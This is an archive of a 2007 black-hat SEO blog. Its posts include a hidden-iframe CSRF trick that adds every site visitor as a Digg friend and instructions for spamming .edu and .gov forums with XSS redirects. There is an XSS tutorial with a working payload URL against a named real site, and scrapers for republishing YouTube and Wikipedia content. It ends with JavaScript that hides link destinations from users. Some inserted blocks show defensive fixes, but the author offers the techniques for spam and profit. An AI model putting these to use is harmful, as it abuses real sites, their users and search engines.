Monthly Archive for March, 2007

Digg Friend Exploit

I’ve just found this here.

In what has got to be the stupidest move in the history of community features, Digg has created a URL-powered friend-adder. Basically, all you have to do is visit the url http://digg.com/invitefrom/{username} such as http://digg.com/invitefrom/russvirante and you automatically add them as your friend if you are currently logged in to Digg.

Add this to your site, and you will automatically add as your friend everyone who visits your site. Remember to change the last part for your Digg username.

<iframe height="1" width="1" src="http://digg.com/invitefrom/{username}"></iframe>
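The root problem is that a plain GET request changes account state, so any page the visitor loads can fire it from their logged-in browser. A server-side fix, sketched as an added example (this is not Digg's code, and every function and field name in it is hypothetical): accept the action only as a POST that carries a per-session token.

```php
<?php
// Added example, not Digg's code: all names below are hypothetical.

// Issue one random token per session; the site embeds it in its own "add friend" form.
function csrf_token(array &$session): string {
	if (empty($session['csrf'])) {
		$session['csrf'] = bin2hex(random_bytes(32));
	}
	return $session['csrf'];
}

// Decide whether an add-friend request is allowed to change state.
function may_add_friend(string $method, array $post, array $session): bool {
	if ($method !== 'POST') {
		return false; // a GET (iframe, img, plain link) must never change state
	}
	$sent = $post['csrf'] ?? '';
	$expected = $session['csrf'] ?? '';
	// hash_equals() compares in constant time; an empty session token never passes
	return is_string($sent) && $expected !== '' && hash_equals($expected, $sent);
}

// Constructed requests, simulated offline instead of reading $_SERVER and $_POST.
$session = [];
$token = csrf_token($session);

$cases = [
	'GET from a hidden iframe'       => ['GET',  []],
	'cross-site POST without token'  => ['POST', ['friend' => 'someuser']],
	'POST from the site\'s own form' => ['POST', ['friend' => 'someuser', 'csrf' => $token]],
];
foreach ($cases as $label => [$method, $post]) {
	echo str_pad($label, 32), may_add_friend($method, $post, $session) ? "allowed\n" : "rejected\n";
}
```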

My First Hate Mail

I’m so excited! I have been blogging just for 24 hours and I’ve already received my first hate mail from Joe Cracker.

I don’t really know him, so I decided to check my server logs and oh boy, he really hates my blog. He hates it so much that he read everything a couple of times, and then he added me to his feed reader… Just to prove that he was extra pissed with me.

Here is the original message:

You are a noob because you fail to address how difficult it is to rank for those keywords via edu spam.

For one, the people who spam .edu sites spam THOUSANDS of guestbooks and forums thousands of times over. In addition you are competing with thousands of spammers. Out of all these millions of pieces of spam generated perhaps only a handful of them will rank for the competitive terms and only for a few days before the university IT staff deletes it or another spam message replaces it.

Your blog reads as if it were written by a script kiddie who just programmed ‘Hello World’. I have read a few entries, and I suggest you do yourself a favor and delete this blog from your server. There are far better blogs out there that are written by people who actually know Blackhat instead of pseudo experts such as yourself.

Lastly, bluehat SEO indexing tool is GARBAGE. I tried it a couple months ago and it doesn’t work. All it does is propagate your link through a bunch of NO FOLLOW blogs and other shit. You know what DOES work? Good ol’ Backlinks!!! Who would have thought.

I just want to point some stuff out about his message:

You are a noob because you fail to address how difficult it is to rank for those keywords via edu spam.
For one, the people who spam .edu sites spam THOUSANDS of guestbooks and forums thousands of times over.

I never said it was easy, did I?

In fact he is absolutely right, you need massive amounts of links pointing to your EDU page (where you place a link or a redirect to your landing page) to rank for highly competitive keywords. Let’s take as an example this URL that I’ve just found ranking for the keyword “ringtones”:

http://www.umes.edu/accsupport/ossd/ossdchat/0000008d.htm?ringtones

Just a forum post with a link to a landing page.

Now let’s analyze the backlinks of that site with Yahoo! SiteExplorer:

[Image: EDU Spam 2]

15,559 links registered by Yahoo! - This can give you a pretty accurate ratio between the amount of competition and the quantity of links you need

As you can see, EDU spamming is not easy at all! Especially if you plan to compete against big brands and other search engine spammers.

Your blog reads as if it were written by a script kiddie who just programmed ‘Hello World’. I have read a few entries, and I suggest you do yourself a favor and delete this blog from your server. There are far better blogs out there that are written by people who actually know Blackhat instead of pseudo experts such as yourself.

A few entries? Yeah right.

*.edu Spam

[Image: EDU Spam]

Go to Google and search for ringtones, cialis, viagra or any other profitable niche and you will see something similar to the image above. This is called edu spam.

As you might know, *.edu and *.gov domains rank way better in search engines (especially Google) than any other TLD, and that’s exactly why some search engine spammers are using those domains to promote their landing pages/affiliate sites.

How do they do it? Well if you look closely you might figure it out by yourself… But for those lazy ones here is a quick explanation of this technique:

  1. Find forums/guestbooks installed on *.gov and *.edu domains. You can find them with Google using a query like this: site:edu OR site:gov “Forum”
  2. Drop your link there - Most of them will accept live links, and if they are vulnerable to XSS you can do so much more like redirecting to your site automatically with JavaScript
  3. Make the spiders crawl that site (QUIT?)
  4. Repeat

Of course the moar the better, so you might want to code a tool to automate the process and get more links.

EDIT: Here you can find an example on EDU spamming (Scroll down to the bottom)

Increase your Link Popularity (Part I)

There are a lot of things that you can do to create links and increase the link popularity of your sites. You can use XSS, comment spam, trackback spam, buy links (aff), link exchange programs etc.

In this part I’m going to explain one of the easiest ways to increase your link popularity: Directory Submission

Yes, I know that this is not a black hat technique so I’m going to keep it REALLY short and I promise that the next part will cover something much more evil… Muahaha!

PROS:

  • Cheap
  • Risk-Free
  • Easy to implement

CONS:

  • Time consuming

For this technique you can:

  1. Download this huge excel list and do it yourself: SEO Friendly Directory List
  2. Hire someone in DigitalPoint to do it for you for $10 - 15 USD (Here, here and here)
  3. Buy a directory submitting software

Easy, isn’t it?

Youtube Scraper

Another scraper, this time for Youtube:

USAGE:

<?php youtube("BMW") ?>

CODE:

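<?php
function youtube($keyword) {
	// Build the tag feed URL for the keyword
	$url = 'http://www.youtube.com/rss/tag/'.urlencode($keyword).'.rss';
	// Read the feed body as a string (fopen() only returns a stream handle)
	$feed = @file_get_contents($url);
	if ($feed === false) {
		return;
	}
	// Capture the enclosure URL up to the "swf" extension
	if (preg_match('/<enclosure url=\"(.*)swf/s', $feed, $y)) {
		// Keep the first 36 characters and escape them for the HTML attributes
		$youtube = htmlspecialchars(substr($y[1], 0, 36), ENT_QUOTES, 'UTF-8');
		$video = '';
		$video .= "\n".'<object type="application/x-shockwave-flash" style="width:400px; height:325px;" data="'.$youtube.'">';
		$video .= "\n".'<param name="movie" value="'.$youtube.'" />';
		$video .= "\n".'</object>';
		$video .= "\n";
		print $video;
	}
}
?>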

XSS Crash Course (Part I)

XSS is a widely used method among search engine spammers (At least it was a couple of months ago.)

In this crash course I will try to explain what XSS is, how to find XSS vulnerabilities, how to protect your sites from XSS and the most important part… How to profit from it ;)

What is XSS?

Inserting HTML/JavaScript into a site through vulnerable user input. For example, a search form, a comment box or even a “submit story” feature.

Real World Scenario

Imagine that you are surfing a really cool site (For example this one) and you want to submit it to your bookmarking site like Digg or Reddit. Let’s say that you are using Kudos.no for your bookmarks. So you click on the “submit it icon” and you get redirected to:

http://www.kudos.no/nysak/?kudosKnapp=1&url=anysite.com

If you take a look at that site, there is a form with the URL you want to submit.

Now let’s try another URL:

http://www.kudos.no/nysak/?kudosKnapp=1&url=othersite.com

As you can see, the &url parameter is inserted automatically in the form. Here is part of the HTML source code of that form:

<input type="text" name="storyLink" id="storyLink"  value="http://somesite.com" />

Everything seems OK, right? Now this is what is happening on the backend of the site:

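<?php
// Vulnerable: the url parameter is taken straight from the query string
$story = $_GET['url'];
//some code
// ...and printed into the value attribute without any escaping
print '<input type="text" name="storyLink" id="storyLink"  value="'.$story.'" />';
//more code
?>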

Everything you send in the &url parameter is being printed in that <input> tag, and without the proper sanitization that is a very bad idea. Here is why it’s a bad idea:

http://www.kudos.no/nysak/?kudosKnapp=1&url=http://somesite"><script>alert("XSS")</script>

As you can see, instead of just sending an URL, we are sending HTML too. Here is the source code of the page:

<input type="text" name="storyLink" id="storyLink"  value="http://somesite"><script>alert("XSS")</script>" />

Did you see the alert pop-up? You have successfully injected your own JavaScript!
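On the defending side, the fix for that backend snippet is to validate the value and escape it for the attribute it is printed into. The following is an added example, not code from Kudos.no or from the original post; the function names are hypothetical, and it assumes submitted links must carry an explicit http or https scheme.

```php
<?php
// Added example: the storyLink field from the text, rendered once the way the
// backend snippet does it (vulnerable) and once hardened. Names are hypothetical.

// Vulnerable form: the value is concatenated into the attribute as-is.
function render_story_input_unsafe(string $story): string {
	return '<input type="text" name="storyLink" id="storyLink" value="'.$story.'" />';
}

// Hardened form: allow only http/https URLs, then escape for an HTML attribute.
function render_story_input(string $story): string {
	$scheme = parse_url($story, PHP_URL_SCHEME);
	if (!in_array(strtolower((string) $scheme), ['http', 'https'], true)) {
		$story = ''; // drop other schemes and values that do not parse as a URL
	}
	// ENT_QUOTES encodes both " and ', so the value cannot close the attribute.
	$safe = htmlspecialchars($story, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
	return '<input type="text" name="storyLink" id="storyLink" value="'.$safe.'" />';
}

// Constructed inputs: a normal URL, the payload from the text, a non-http scheme.
$samples = [
	'http://othersite.com',
	'http://somesite"><script>alert("XSS")</script>',
	'javascript:void(0)',
];

foreach ($samples as $s) {
	echo "input:    $s\n";
	echo "unsafe:   ".render_story_input_unsafe($s)."\n";
	echo "hardened: ".render_story_input($s)."\n\n";
}
```

In the hardened output the payload's quotes and angle brackets arrive as entities, so the browser keeps the whole string inside the value attribute instead of starting a new tag.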

I’m working on Part II, meanwhile you can keep reading about XSS in this blog.

Boost your Technorati rank!

The original articles can be found here and here.

This is a small step-by-step guide to increase your Technorati rank overnight.

First some background information. The Technorati rank is an index of the popularity of your blog, based on the number of blogs that link to it. You can see the current rank by clicking here.

So the more links pointing to your blog, the better. Unfortunately not all the links are credited by Technorati, so we need to help them a little bit ;)

  1. Find all the URLs that have a link to your blog, you can do this with Xenu, Yahoo! Site Explorer or even this tool
  2. Use any pinging tool to ping each URL to: http://rpc.technorati.com/rpc/ping
  3. Watch your ranking increase!

QUIT - Quick Indexing Tool

Today I’m going to write about a very cool (and free) SEO tool: QUIT

What is QUIT?

QUIT is an SEO tool developed by BlueHatSEO.com. According to the site, QUIT is a tool that “utilizes tons of techniques to get your site crawled and indexed VERY quickly.”

At first I was skeptical about this tool, but after some testing on my own I can tell for sure that it works, and works really well! (If you don’t believe me, read the comments left by other people.)

This is great to give a boost start to all your spammy pages (Or even WH sites)

Happy indexing ;)

Wikipedia Scraper

Here is a snippet from [YACG] Yet Another Content Generator to scrape Wikipedia articles. Great for content generation and arbitrage. Here is the code:

Usage:

<?php wikipedia("http://en.wikipedia.org/wiki/Google") ?>

Code:

<?php
function wikipedia($article)	{
	$pattern[0] = '/<a href="(.*?)">(.*?)<\\/a>/';
	$replace[0] = '$2';
	$pattern[1] = '/<h3 id=\"siteSub\">From Wikipedia, the free encyclopedia<\/h3>/';
	$replace[1] = '';
	$pattern[2] = '/<div id=\"contentSub\">(.*?)<\/div><div id=\"jump-to-nav\">Jump to: navigation, search<\/div>/';
	$replace[2] = '';
	$pattern[3] = '/<div class=\"messagebox cleanup metadata\">(.*?)<p><br \/><\/p>/';
	$replace[3] = '';
	$pattern[4] = '/<table class=\"messagebox\" (.*?)>(.*?)<\/table>/';
	$replace[4] = '';
	$pattern[5] = '/<dl>(.*?)<\/dl>/';
	$replace[5] = '';
	$pattern[6] = '/<h1 class=\"firstHeading"\>(.*?)<\/h1>/';
	$replace[6] = '<h3>$1</h3>';
	$pattern[7] = '/<table class=\"messagebox protected\" style=\"border: 1px solid #8888aa; padding: 0px; font-size:9pt;\">(.*?)<\/table>/';
	$replace[7] = '';
	$pattern[8] = '/<div class=\"infobox sisterproject\">(.*?)<\/div><\/div>/';
	$replace[8] = '';
	$pattern[9] = '/<sup (.*?)>(.*?)<\/sup>/';
	$replace[9] = '';
	$pattern[10] = '/<table style=\"background: transparent;\" width=\"0\">(.*?)<\/table>/';
	$replace[10] = '';
	$pattern[11] = '/<table class=\"messagebox current\" style=\"font-size:	normal;\">(.*?)<\/table>/';
	$replace[11] = '';
	$pattern[12] = '/<table class=\"toccolours\" align=\"center\" width=\"55%\" cellpadding=\"0\" cellspacing=\"0\">(.*?)<\/table>/';
	$replace[12] = '';
	$pattern[13] = '/<div class=\"editsection\"(.*?)>(.*?)<\/div>/';
	$replace[13] = '';
	$pattern[14] = '/<div id=\"bodyContent\">/';
	$replace[14] = '<div>';
	$pattern[15] = '/<dd>(.*?)<\/dd>/';
	$replace[15] = '';
	$pattern[16] = '/<div class=\"messagebox cleanup metadata\">(.*?)<\/div>/';
	$replace[16] = '';
	$pattern[17] = '/<div class=\"thumbcaption\">(.*?)<\/div><\/div>/';
	$replace[17] = '';
	$pattern[18] = '/<div class=\"thumb tright\">/';
	$replace[18] = '';
	$pattern[19] = '/\[(.*?)\]/';
	$replace[19] = '';
	$pattern[20] = '/<table class="messagebox protected" (.*?)>(.*?)<\/table>/';
	$replace[20] = '';
	$pattern[21] = '/<div style="position:absolute; z-index:100; right:20px; top:10px; height:10px; width:300px;"><\/div>/';
	$replace[21] = '';
	$pattern[22] = '/<div style="position:absolute; z-index:100; right:10px; top:10px;" class="metadata" id="administrator">(.*?)<\/div><\/div>/';
	$replace[22] = '';
	$pattern[23] = '/<table class="messagebox current"(.*?)>(.*?)<\/table>/';
	$replace[23] = '';
	$pattern[24] = '/<table class="messagebox current" style="width: auto;">(.*?)<\/table>/';
	$replace[24] = '';
	$pattern[25] = '/<div class="dablink">(.*?)<\/div>/';
	$replace[25] = '';
	$pattern[26] = '/<b>/';
	$replace[26] = '<strong>';
	$pattern[27] = '/<\/b>/';
	$replace[27] = '</strong>';
	$pattern[28] = '/<div(.*?)>/';
	$replace[28] = '';
	$pattern[29] = '/<\/div>/';
	$replace[29] = '';
	$pattern[30] = '/<map(.*?)>(.*?)<\/map>/';
	$replace[30] = '';
	$pattern[31] = '/<img src="(.*?)" alt="This page is semi-protected." width="18" (.*?)\/>/';
	$replace[31] = '';
	$pattern[32] = '/<table style="width:100%;background:none">(.*?)<\/table>/';
	$replace[32] = '';
	$pattern[33] = '/<div class="messagebox merge metadata">(.*?)<\/div>/';
	$replace[33] = '';
	// Read the article HTML as a string (fopen() only returns a stream handle)
	$wikipedia = file_get_contents($article);
	if ($wikipedia === false) {
		return;
	}
	$wikipedia = preg_replace($pattern, $replace, $wikipedia);
	// Keep only the text between the content marker and the first end marker that matches
	if (preg_match("/<\!-- start content --\>(.*)<table id=\"toc\" class=\"toc\" summary=\"(.*)\">/", $wikipedia, $w)) {
		$wikipedia = $w[1];
	} elseif (preg_match("/<\!-- start content --\>(.*)<a name=\"(.*)\">/is", $wikipedia, $w)) {
		$wikipedia = $w[1];
	} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"boilerplate metadata\" id=\"stub\">/is", $wikipedia, $w)) {
		$wikipedia = $w[1];
	} elseif (preg_match("/<\!-- start content --\>(.*)<div class=\"printfooter\">/is", $wikipedia, $w)) {
		$wikipedia = $w[1];
	}
	print $wikipedia;
}
?>

The regex to remove all the trash that Wikipedia adds to the articles sucks, so I’m looking for someone to help me with it. Interested? Drop me a line!

Clickbait

Driving traffic to your site is not enough, you probably want users to click on something - probably an ad. But you have to be creative, nowadays users are much more savvy and the old anchors like “Click here for free porn” are not enough.

For example, play the following Youtube video:

[Image: sexy1]

As you can see, it’s not really a Youtube video… It’s a link.

You get the idea now? This could really come in handy for marketing in Hi5, Facebook, MySpace etc…

In the end, it all comes down to being creative and paying attention to the small details, so you might want to hide the links from the status bar with some JavaScript like this:

<a href="http://www.yourlandingpage.com" onmouseover="window.status='!'; return true" onmouseout="window.status=''; return true"></a>